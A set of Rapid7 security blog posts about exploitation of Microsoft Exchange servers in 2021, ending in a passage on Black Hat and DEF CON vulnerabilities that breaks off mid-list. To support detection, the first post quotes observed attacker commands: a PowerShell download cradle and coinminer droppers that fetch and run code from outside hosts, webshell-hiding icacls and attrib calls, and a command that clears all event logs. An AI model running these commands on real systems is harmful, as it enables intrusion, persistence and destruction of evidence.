They would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells and using icacls to recursively set the permissions of the webroot directory to read-only. Additionally, the attacker used the attrib.exe utility to mark the file containing the webshell as hidden and system, making it harder to find.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program 
Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using 
[wevtutil.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands that use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents of possible webshell files named outlooken.aspx, a name seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers, or even researchers using the same exploit to identify systems that have been successfully compromised, based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this 
attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again, retrieving a slightly different filename from the same host:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon-type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several 
different attackers with different motivations and skills. Rapid7 even observed exploitation of the same victim by multiple different actors (HAFNIUM and coinminer droppers) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as the credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale because the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM and the subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, organizations can greatly increase the likelihood of being notified of a breach, regardless of the method used to obtain initial access to the victim environment. 
Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the 
Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." 
More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. 
These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. 
Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. 
Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 
27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. 
It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. 
The PoC uses a download request to `/ecp/poc.png` (though the name could be anything), and that request may be recorded in the IIS logs themselves, attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes SetObject to write the token to the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP downloaded any files.", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. 
The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). 
Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. 
ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. 
Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. 
Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in 